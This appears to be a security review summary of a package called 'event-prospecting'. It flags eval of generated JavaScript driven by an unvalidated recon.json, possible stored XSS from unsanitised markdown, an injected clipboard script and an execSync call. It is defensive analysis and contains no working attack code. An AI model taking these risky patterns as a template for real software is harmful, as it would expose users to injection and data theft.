event-prospecting

This module is mainly a web-scraping/extraction CLI that writes scraped people/company data to local files. It shows no clear evidence of classic malware (credential theft, persistence, crypto-mining, or direct data exfiltration) within the provided code. However, it uses a high-sensitivity pattern: it invokes an external 'browse' binary and passes a dynamically generated JavaScript payload to browse('eval', ...), while both navigation (recon.url) and extraction behavior (recon.nextDataPaths) are driven by unvalidated recon.json. If recon.json or recon.url can be influenced by an attacker, this can materially increase risk via arbitrary target navigation and powerful page-context evaluation. Additionally, the resolveImage snippet appears truncated/malformed, suggesting a robustness issue.

This module primarily performs static HTML/CSV generation, but it contains two high-impact client-side risk patterns: (1) it embeds markdown-rendered HTML directly into per-company pages without explicit sanitization in the visible code, making stored XSS dependent on mdToHtml/escaping correctness; and (2) it unconditionally injects clipboardScript into generated pages, creating a strong privacy/data-theft risk if that script reads clipboard contents or performs tracking/exfiltration. File writes and CSV generation are expected for this workflow. The optional execSync ‘open’ call is a secondary risk sink. Review and verify mdToHtml sanitization behavior and the exact clipboardScript functionality before using the generated site.